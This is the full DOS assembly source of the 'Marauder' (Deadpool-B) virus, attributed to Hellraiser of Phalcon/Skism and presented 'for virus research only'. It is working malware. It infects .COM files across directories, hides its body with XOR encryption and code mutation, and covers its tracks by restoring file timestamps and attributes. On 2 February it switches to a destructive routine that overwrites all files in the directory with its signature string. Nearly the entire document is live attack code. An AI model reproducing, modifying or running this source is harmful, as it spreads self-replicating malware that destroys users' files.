; "Marauder" Virus ; AKA Deadpool-B ; ; By Hellraiser ; Of Phalcon/Skism ; ; For virus reseach only ; ; I always wanted to release this source, so here it is. Now that it's been caught ; take a look at whats inside. ; ; I know it's no great thing, but it's good to learn from. It contains basic ; encryption, mutation, and INT 24 handling. ; ; I will be very upset if I see 100 new versions of this code with some lame kids ; name in place of mine. So just use it to learn from, it's very straight foward. code segment 'code' assume cs:code, ds:code, ss:code, es:code org 0100h dta EQU endcode + 10 headlength EQU headend - headstart bodylength EQU bodyend - bodystart encryptpart EQU bodyend - mixed_up part1size EQU part2 - part1 part2size EQU parta - part2 partasize EQU partb - parta partbsize EQU dude - partb mutants EQU chris - part1 total_mutant EQU mutants / 2 encryptlength EQU encryptpart / 2 virus_size EQU headlength + bodylength + 5 ; head + body + int24 + 2 drive EQU endcode + 110 backslash EQU endcode + 111 orig_path EQU endcode + 113 dirdta EQU orig_path + 66 myid EQU 88h toolarge EQU 65535 - virus_size fileattr EQU 21 filetime EQU 22 filedate EQU 24 filename EQU 30 headstart: jmp bodystart db myid headend: realprogramstart: db 90h, 90h, 90h db 0cdh, 020h, 1ah, 1ah realprogramend: bodystart: call deadpool deadpool: pop si sub si,offset deadpool call encrypt jmp chris enc_code dw 0000h encrypt proc near assume cs:code, ds:code, es:code, ss:code part1_: push ax push bx push cx push dx mov cx, encryptlength mov bp, si add si, offset bodyend mov di,si std xor_loop: lodsw xor ax, [bp + enc_code] stosw loop xor_loop done_: mov si, bp pop dx pop cx pop bx pop ax ret ;nop encrypt endp infect proc near call encrypt int 21h call encrypt ret infect endp mixed_up: part1: push dx push cx push bx push ax mov cx, encryptlength mov bp, si add si, offset mixed_up mov di,si cld part2: mov si, bp pop ax pop bx pop cx pop dx parta: mov bp, si add si, offset endcode mov di, si push ax push bx push cx push dx mov cx, encryptlength std partb: pop dx pop cx pop bx pop ax mov si, bp dude: ; don't get any ideas lamer hellraiser label byte idbuffer db 0cdh, 20h,' [Marauder] 1992 Hellraiser - Phalcon/Skism. ' stringsize EQU ($ - hellraiser) chris: push es mov ax,3524h int 21h mov [si + word ptr oint24], bx mov [si + word ptr oint24 + 2], es pop es mov ax, 2524h lea dx, [si + newint24] int 21h push si mov ah, 47h xor dl,dl add si, offset orig_path int 21h pop si mov ah,19h int 21h add al, 41h mov byte ptr [si + offset drive], al mov ax, '\:' mov word ptr [si + offset backslash], ax ;mov byte ptr [si + offset defaultdrive], al ; here's my new tri-dimensional jmp displacement theory in play push si pop bp lea si, [bp + offset oldjmp] lea di, [bp + offset thisjmp] mov cx,04h cld rep movsb push bp pop si why: mov ah,1ah lea dx,[si + dta] int 21h mov ah,2ah int 21h cmp dx, 0202h jne ff jmp smash ff: mov ah,4eh lea dx,[si + filespec] mov cx, 07h searchloop: int 21h jnc here ;jmp up mov ah,1ah lea dx,[si + dirdta] int 21h mov ah,3bh lea dx,[si + offset rootdir] int 21h jc at_root jmp why at_root: cmp byte ptr [si + donebefore], 01h je notokey mov al,01h mov [si + donebefore], al mov ah,4eh xor cx,cx mov cl,13h lea dx, [si + dwildcards] ffdloop: int 21h jnc okey jmp far ptr nofilesfound notokey: mov ah,4fh jmp ffdloop okey: mov ah,3bh lea dx, [si + offset dirdta + filename] int 21h jc notokey jmp why here: mov bx, word ptr [si + offset dta + fileattr] mov word ptr [si + origattr], bx mov ax,4301h xor cx,cx lea dx, [si + offset dta + filename] int 21h jc bad_file2 call openfile jc bad_file2 mov word ptr [si + offset handle], ax mov bx, word ptr [si + offset dta + filedate] mov word ptr [si + origdate], bx mov bx, word ptr [si + offset dta + filetime] mov word ptr [si + origtime], bx xchg bx, ax mov ah, 3fh mov cx, 4 lea dx, [si + oldjmp] int 21h cmp byte ptr [si + offset oldjmp + 3], myid jne sick_of_it_all bad_file: mov ax,4301h mov cx, word ptr [si + offset origattr] lea dx, [si + offset dta + filename] xor ch,ch int 21h mov ah,3eh int 21h bad_file2: cmp ax, 05h je dumb cmp ax, 02h je dumb mov ah, 4fh jmp searchloop dumb: jmp nofilesfound sick_of_it_all: cmp word ptr [si + offset oldjmp], 5a4dh je bad_file call seekeof cmp ax,0010h jb bad_file cmp ax, toolarge jae bad_file sub ax,03h mov [si + newjmp + 2], ah mov [si + newjmp+ 1], al mov [si + newjmp + 3], myid mov ah, 0e9h mov [si + newjmp], ah xor al,al mov [si + donebefore], al inc word ptr [si + generation] mov bp, si call enc_enc tryagain: mov ah,2ch int 21h cmp dx, 0000h je tryagain mov word ptr [si + offset enc_code], dx mov cl, 8 ror dx, cl mov word ptr [si + offset mutantcode], dx cmp dl, 30 jng encrypt_a jmp encrypt_b encrypt_a: ;mov bp, si lea si,[bp + offset part1] lea di,[bp + offset part1_] mov cx, part1size call dostring lea si,[bp + offset part2] lea di,[bp + offset done_] mov cx, part2size call dostring jmp attach encrypt_b: lea si,[bp + offset parta] lea di,[bp + offset part1_] mov cx, part1size call dostring lea si,[bp + offset partb] lea di,[bp + offset done_] mov cx, part2size call dostring attach: call enc_enc mov si,bp mov ah,40h mov cx, bodyend - bodystart add cx, 5 lea dx,[si + bodystart] call infect jc close_file call seektof mov ah,40h mov cx, 4 lea dx,[si + offset newjmp] int 21h close_file: mov ax,5701h mov cx, word ptr [si + offset origtime] mov dx, word ptr [si + offset origdate] mov bx, word ptr [si + offset handle] int 21h mov ah, 3eh int 21h mov ax,4301h mov cx, word ptr [si + offset origattr] lea dx, [si + offset dta + filename] xor ch,ch int 21h nofilesfound: mov ah, 03bh lea dx, [si + offset drive] int 21h restoredta: mov ah, 1ah mov dx, 080h int 21h push si pop bp mov ax, 2524h lea dx, [si + oint24] int 21h lea si,[bp + offset thisjmp] mov di,100h mov cx,04h cld rep movsb mov di, 0100h jmp di smash proc near call enc_enc mov ah, 4eh mov cx, 07h lea dx, [si + offset dwildcards] ; r_loop: int 21h jc restoredta call kill mov ah, 4fh jmp r_loop smash endp dostring proc near cld rep movsb ret dostring endp enc_enc proc near mov si, bp add si, offset part1 mov di, si mov cx, total_mutant loop_xor: lodsw xor ax, [bp + mutantcode] ; stosw loop loop_xor mov si, bp ret enc_enc endp seektof proc near mov ax,4200h xor cx,cx xor dx,dx int 21h ret seektof endp seekeof proc near mov ax,4202h xor dx,dx xor cx,cx int 21h ret seekeof endp openfile proc near mov ax,3d02h lea dx, [si + offset dta + filename] int 21h ret openfile endp kill proc near call openfile jc return mov bx, ax push bx call seekeof mov bx, stringsize div bx mov cx, ax pop bx push cx call seektof pop cx loop_: push cx mov ah, 40h mov cx, stringsize lea dx, [si + offset idbuffer] int 21h jc ender pop cx dec cx jcxz ender jmp loop_ ender: mov ah, 3eh int 21h return: ret kill endp filespec db '*.COM',0 dwildcards db '*.*',0 rootdir db '..',0 generation dw 0000 origdate dw ? origtime dw ? origattr db ? handle dw ? defaultdrive db ? oldjmp db 09h, 0cdh, 020h, 90h thisjmp db 4 dup (?) newjmp db 4 dup (?) mutantcode dw 0000 donebefore db 00 oint24 dd 00 bodyend: ; not encrypted newint24: xor al,al iret endcode: code ends end headstart